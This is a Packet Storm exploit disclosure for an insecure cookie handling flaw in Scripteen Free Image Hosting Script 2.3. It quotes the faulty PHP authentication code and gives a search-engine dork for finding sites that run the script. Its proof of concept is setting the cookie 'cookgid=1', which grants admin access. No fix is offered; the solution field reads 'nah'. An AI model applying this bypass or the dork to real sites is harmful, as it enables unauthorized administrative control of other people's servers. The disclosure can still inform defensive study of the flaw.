Scripteen Free Image Hosting version 2.3 suffers from an insecure cookie handling vulnerability.
2fdb7256439f49278e5bace486d11527216394664fe0a5d939aec3b74bdb56ac || || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ\__
__/QQQ/````````````````\QQQ\___
_/QQQQQ/ \QQQQQQ\
/QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
|QQQQ/ By Qabandi \QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqa[a]hotmail.fr /QQQQ|
\QQQQ\ __ /QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
``````````````````` `````
=Vuln: Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling
=INFO: http://www.scripteen.com/
=BUY: ---
=Download: http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html
=DORK: DORK:"Powered by Scripteen Free Image Hosting Script V 2.3"
____________
_-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````
none
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in ".\admin\header.php"
$userid=$_SESSION['userid'];
$usergid=$_SESSION['usergid'];
if (!$userid || empty($userid) || $userid==""){
$userid = $_COOKIE['cookid'];
$usergid = $_COOKIE['cookgid'];
}
// this is the scripts authentication code, pasted in all admin files.. fail.
if($usergid!="1")
{
header("Location: logout.php"); exit;
}
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
Set:
Cookie: cookgid=1
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
nah
---------------------------------------===--------------------------------------
______________________________________________________________________________
/ \
| ---------------------------------------------------------------------- |
\______________________________________________________________________________/
\ No More Private /
`````````````````
Salamz to All Muslim Hackers.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed